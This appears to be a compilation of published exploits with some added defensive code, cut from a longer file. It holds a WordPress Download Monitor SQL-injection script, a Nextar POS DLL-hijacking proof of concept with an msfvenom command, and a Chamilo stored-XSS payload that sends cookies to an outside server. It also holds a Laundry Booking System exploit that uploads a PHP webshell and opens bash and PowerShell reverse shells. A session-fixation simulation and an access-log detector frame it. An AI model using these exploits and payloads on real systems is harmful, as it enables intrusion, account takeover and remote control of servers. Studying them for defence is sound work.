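    carried = dict(store.data(sid))
    store.destroy(sid)
    new_sid = store.new_id()
    store.data(new_sid).update(carried)
    store.data(new_sid)["user"] = user
    return new_sid


def fixation_attempt(resolver) -> bool:
    """Simulate the PoC: the client presents an attacker-chosen OCSESSID.
    Returns True if the server adopted it, i.e. fixation succeeded."""
    store = SessionStore()
    planted = "zxcvzxcvzxcvzxcvzxcvzxcv"   # the value from the request above
    return resolver(store, planted) == planted


if __name__ == "__main__":
    print("vulnerable adopts planted id:", fixation_attempt(resolve_vulnerable))   # True
    print("hardened adopts planted id:  ", fixation_attempt(resolve_hardened))     # False
```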
<pre><code># Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)<br />
# Date 28.01.2022<br />
# Exploit Author: Ron Jost (Hacker5preme)<br />
# Vendor Homepage: https://www.download-monitor.com/<br />
# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip<br />
# Version: < 4.4.5<br />
# Tested on: Ubuntu 20.04<br />
# CVE: CVE-2021-24786<br />
# CWE: CWE-89<br />
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md<br />
<br />
'''<br />
Description:<br />
The Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the "orderby" GET parameter<br />
before using it in a SQL statement when viewing the logs, leading to an SQL Injection issue<br />
'''<br />
<br />
# Banner:<br />
banner = '''<br />
<br />
 ___ __ ____ ___ ____ _ ____ _ _ _____ ___ __ <br />
 / __\/\ /\/__\ |___ \ / _ \___ \/ | |___ \| || |___ ( _ ) / /_ <br />
 / / \ \ / /_\_____ __) | | | |__) | |_____ __) | || |_ / // _ \| '_ \ <br />
/ /___ \ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |<br />
\____/ \_/\__/ |_____|\___/_____|_| |_____| |_|/_/ \___/ \___/ <br />
 <br />
 [+] Download Monitor - SQL-Injection<br />
 [@] Developed by Ron Jost (Hacker5preme)<br />
'''<br />
print(banner)<br />
<br />
import argparse<br />
import requests<br />
from datetime import datetime<br />
<br />
# User-Input:<br />
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Download Monitor - SQL Injection')<br />
my_parser.add_argument('-T', '--IP', type=str)<br />
my_parser.add_argument('-P', '--PORT', type=str)<br />
my_parser.add_argument('-U', '--PATH', type=str)<br />
my_parser.add_argument('-u', '--USERNAME', type=str)<br />
my_parser.add_argument('-p', '--PASSWORD', type=str)<br />
args = my_parser.parse_args()<br />
target_ip = args.IP<br />
target_port = args.PORT<br />
wp_path = args.PATH<br />
username = args.USERNAME<br />
password = args.PASSWORD<br />
<br />
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />
<br />
# Authentication: log in as the supplied WordPress user and keep the session cookies<br />
session = requests.Session()<br />
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'<br />
check = session.get(auth_url)<br />
# Header:<br />
header = {<br />
    'Host': target_ip,<br />
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',<br />
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',<br />
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',<br />
    'Accept-Encoding': 'gzip, deflate',<br />
    'Content-Type': 'application/x-www-form-urlencoded',<br />
    'Origin': 'http://' + target_ip,<br />
    'Connection': 'close',<br />
    'Upgrade-Insecure-Requests': '1'<br />
}<br />
<br />
# Body:<br />
body = {<br />
    'log': username,<br />
    'pwd': password,<br />
    'wp-submit': 'Log In',<br />
    'testcookie': '1'<br />
}<br />
auth = session.post(auth_url, headers=header, data=body)<br />
<br />
# Exploit (WORKS ONLY IF ONE LOG EXISTS)<br />
print('')<br />
print('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')<br />
print('')<br />
# Generate payload for SQL-Injection: the user input is spliced into the unescaped "orderby" parameter<br />
sql_injection_code = input('[+] SQL-INJECTION COMMAND: ')<br />
sql_injection_code = sql_injection_code.replace(' ', '+')<br />
exploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'<br />
exploit = session.get(exploitcode_url)<br />
print(exploit)<br />
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />
<br />
</code></pre>
<pre><code>/*<br />
Description:<br />
A vulnerability exists in Windows that allows a malicious dynamic link library to be loaded by another application and executed without the user's consent, in the privilege context of the targeted application.<br />
<br />
Exploit Title: Nextar C472 POS DLL Hijacking Exploit (nxmm.dll - mdmdregistration.dll)<br />
Date: 28/11/2021<br />
Author: Yehia Elghaly<br />
Vendor: https://www.nextar.com/<br />
Software: https://download.nextar.com/latest/setup_nex_en.exe<br />
Version: Latest Nextar C472 POS<br />
Tested on: Windows 7 Pro x86 - Windows 10 x64<br />
Vulnerable extensions: .htm .html<br />
*/<br />
<br />
/*<br />
Instructions:<br />
<br />
1. Create a DLL using msfvenom (sudo msfvenom --platform windows -p windows/messagebox TEXT="Nex POS Hacked - YME" -f dll > nxmm.dll) or compile the code below<br />
2. Replace nxmm.dll, mdmdregistration.dll or shcore.dll in the Nex directory C:\Nex with your newly built DLL<br />
3. Launch NexAdmin.exe<br />
4. Pop-up MessageBox!<br />
*/<br />
<br />
#include <windows.h><br />
<br />
/* Forward declaration so DllMain can call the payload before its definition */<br />
static void dll_mll(void);<br />
<br />
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)<br />
{<br />
    switch (fdwReason)<br />
    {<br />
    case DLL_PROCESS_ATTACH:<br />
        /* Runs as soon as the hijacked DLL is loaded into the target process */<br />
        dll_mll();<br />
        break;<br />
    case DLL_THREAD_ATTACH:<br />
    case DLL_THREAD_DETACH:<br />
    case DLL_PROCESS_DETACH:<br />
        break;<br />
    }<br />
<br />
    return TRUE;<br />
}<br />
<br />
/* Proof-of-concept payload: a message box shown in the context of the loading process */<br />
static void dll_mll(void)<br />
{<br />
    MessageBox(0, "Nex POS Hacked!", "YME", MB_OK);<br />
}<br />
</code></pre>
<pre><code># Exploit Title: Chamilo LMS 1.11.14 - Account Takeover<br />
# Date: July 21 2021<br />
# Exploit Author: sirpedrotavares<br />
# Vendor Homepage: https://chamilo.org<br />
# Software Link: https://chamilo.org<br />
# Version: Chamilo-lms-1.11.x<br />
# Tested on: Chamilo-lms-1.11.x<br />
# CVE: CVE-2021-37391<br />
# Publication: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities<br />
<br />
<br />
Description: A user without privileges in Chamilo LMS 1.11.x can send an invitation message to another user, e.g. the administrator, through main/social/search.php and main/inc/lib/social.lib.php, and steal cookies or execute arbitrary code on the administrator's side via a stored XSS vulnerability in the social network's send-invitation feature.<br />
CVE ID: CVE-2021-37391<br />
CVSS: Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N<br />
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chamilo-lms-1.11.14-xss-vulnerabilities<br />
<br />
Affected parameter: send private message - text field<br />
Payload: <img src=x onerror=this.src='http://yourserver/?c='+document.cookie><br />
<br />
<br />
Steps to reproduce:<br />
 1. Navigate to the social network menu<br />
 2. Select the victim profile<br />
 3. Add the payload on the text field<br />
 4. Submit the request and wait for the payload execution<br />
<br />
*Impact:* By using this vulnerability, an unprivileged user can steal cookies from an admin account or force the administrator to create an account with admin privileges with an HTTP 302 redirect.<br />
*Mitigation*: Update Chamilo to the latest version.<br />
*Fix*: https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8<br />
<br />
<br />
<br />
With my best regards,<br />
--<br />
*Pedro Tavares*<br />
Founder and Editor-in-Chief at seguranca-informatica.pt<br />
Co-founder of CSIRT.UBI<br />
Creator of 0xSI_f33d <https://feed.seguranca-informatica.pt/><br />
<br />
<br />
seguranca-informatica.pt | @sirpedrotavares <https://twitter.com/sirpedrotavares> | 0xSI_f33d <https://feed.seguranca-informatica.pt/><br />
<br />
</code></pre>
<pre><code># Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE)
# Date: 29/11/2021
# Exploit Author: Pablo Santiago
# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip
# Version: 1.0
# Tested on: Windows 7 and Ubuntu 21.10

# Vulnerability: It's possible to create a user without being authenticated;
# in this request you can upload a simple webshell, which is then used to get a
# reverse shell

import re, sys, argparse, requests, time, os
import subprocess, pyfiglet

ascii_banner = pyfiglet.figlet_format("Laundry")
print(ascii_banner)
print(" Booking Management System\n")
print("----[Broken Access Control to RCE]----\n")


class Exploit:

    def __init__(self, target, shell_name, localhost, localport, os):

        self.target = target
        self.shell_name = shell_name
        self.localhost = localhost
        self.localport = localport
        self.LHL = '/'.join([localhost, localport])          # host/port form used by the bash payload
        self.HPW = "'" + localhost + "'" + ',' + localport   # 'host',port form used by the PowerShell payload
        self.os = os
        self.session = requests.Session()
        #self.http_proxy = "http://127.0.0.1:8080"
        #self.https_proxy = "https://127.0.0.1:8080"
        #self.proxies = {"http" : self.http_proxy,
        #                "https" : self.https_proxy}

        # No valid session is needed: the endpoint never checks authentication
        self.headers = {'Cookie': 'PHPSESSID= Broken Access Control'}

    def create_user(self):

        url = self.target + "/pages/save_user.php"
        data = {
            "fname": "bypass",
            "email": "bypass@bypass.com",
            "password": "password",
            "group_id": "2",
        }

        # Creates user "bypass" and uploads a simple webshell without authentication
        request = self.session.post(url, data=data, headers=self.headers,
                                    files={"image": (self.shell_name + '.php', "<?=`$_GET[cmd]`?>")})
        time.sleep(3)
        if request.status_code == 200:
            print('[*] The user and webshell were created\n')
        else:
            print('Something went wrong...!')

    def execute_shell(self):
        if self.os == "linux":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc", "-nvlp", self.localport])
            time.sleep(3)

            # Use a payload in bash to get a reverse shell
            payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/' + self.LHL + '+0>%261"'
            execute_command = self.target + '/uploadImage/Profile/' + self.shell_name + '.php?cmd=' + payload

            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)

            except requests.exceptions.ReadTimeout:
                pass

        elif self.os == "windows":
            time.sleep(3)
            print("[*] Starting reverse shell\n")
            subprocess.Popen(["nc", "-nvlp", self.localport])
            time.sleep(3)

            # Use a payload in powershell to get a reverse shell
            payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient(""" + self.HPW + """)%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()"""
            execute_command = self.target + '/uploadImage/Profile/' + self.shell_name + '.php?cmd=' + payload

            try:
                request_rce = requests.get(execute_command)
                print(request_rce.text)

            except requests.exceptions.ReadTimeout:
                pass

        else:
            print('Windows or linux')


def get_args():
    parser = argparse.ArgumentParser(description='Laundry Booking Management System')
    parser.add_argument('-t', '--target', dest="target", required=True,
                        action='store', help='Target url')
    parser.add_argument('-s', '--shell_name', dest="shell_name",
                        required=True, action='store', help='shell_name')
    parser.add_argument('-l', '--localhost', dest="localhost",
                        required=True, action='store', help='local host')
    parser.add_argument('-p', '--localport', dest="localport",
                        required=True, action='store', help='local port')
    parser.add_argument('-os', '--os', choices=['linux', 'windows'],
                        dest="os", required=True, action='store', help='linux,windows')
    args = parser.parse_args()
    return args


args = get_args()
target = args.target
shell_name = args.shell_name
localhost = args.localhost
localport = args.localport


xp = Exploit(target, shell_name, localhost, localport, args.os)
xp.create_user()
xp.execute_shell()

# Example, vulnerable software installed on Windows: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows
# Example, vulnerable software installed on Linux:   python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux
</code></pre>
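The attack chain the header comment describes (an unauthenticated POST to the user-creation endpoint that carries an arbitrary file upload, then a request for the uploaded .php file with a command parameter) leaves a recognisable footprint in an ordinary web-server access log. The following is an added detection example, not code from the advisory or the exploit: it uses the two paths the exploit targets, /pages/save_user.php and /uploadImage/Profile/, and runs over constructed Apache combined-format log lines (the client addresses, timestamps and file name are made up).

```python
"""Detect the Laundry Booking Management System attack chain in web access logs.

Added example, not part of the advisory or the exploit. The indicators are the
two paths the exploit uses: /pages/save_user.php (user creation with a file
upload, no authentication check) and /uploadImage/Profile/<name>.php (execution
of the uploaded file). SAMPLE_LOG is constructed Apache combined-format data.
"""
import re
from urllib.parse import parse_qs, urlsplit

USER_ENDPOINT = "/pages/save_user.php"
PROFILE_DIR = "/uploadImage/Profile/"

# ip ident user [timestamp] "METHOD url PROTOCOL" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: 10.0.0.7 performs the full chain, 10.0.0.9 only registers
# and fetches a real image from the profile directory.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2021:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120
10.0.0.7 - - [29/Nov/2021:10:00:05 +0000] "POST /pages/save_user.php HTTP/1.1" 200 41
10.0.0.7 - - [29/Nov/2021:10:00:09 +0000] "GET /uploadImage/Profile/rce.php?cmd=id HTTP/1.1" 200 73
10.0.0.9 - - [29/Nov/2021:10:01:00 +0000] "GET /uploadImage/Profile/avatar.jpg HTTP/1.1" 200 20480
10.0.0.9 - - [29/Nov/2021:10:01:30 +0000] "POST /pages/save_user.php HTTP/1.1" 200 41
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if malformed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def find_indicators(log_text):
    """Scan access-log text and return a summary dict.

    script_requests: (ip, path, has_cmd) for every request of a .php file under
        the profile-image upload directory; an image folder should never serve
        scripts, so each of these is an indicator on its own.
    chained_ips: clients that POSTed to save_user.php and later requested such a
        script, i.e. the exact sequence the exploit performs.
    registrations: clients that only POSTed to save_user.php; likely benign, but
        worth correlating with session data the access log does not carry.
    """
    script_requests = []
    registered = set()
    chained = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, path = rec["ip"], rec["path"]
        if rec["method"] == "POST" and path == USER_ENDPOINT:
            registered.add(ip)
        elif path.startswith(PROFILE_DIR) and path.lower().endswith(".php"):
            script_requests.append((ip, path, "cmd" in rec["query"]))
            if ip in registered and ip not in chained:
                chained.append(ip)
    return {
        "script_requests": script_requests,
        "chained_ips": chained,
        "registrations": sorted(registered - set(chained)),
    }


if __name__ == "__main__":
    for key, value in find_indicators(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

A request for any .php file under an image upload directory is sufficient on its own to open an investigation; the correlation with the preceding user-creation POST only raises confidence. The durable fix belongs on the server: require an authenticated administrator for save_user.php, store uploaded images under a server-generated name with an allow-listed extension, and keep the upload directory out of any path the web server will execute.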
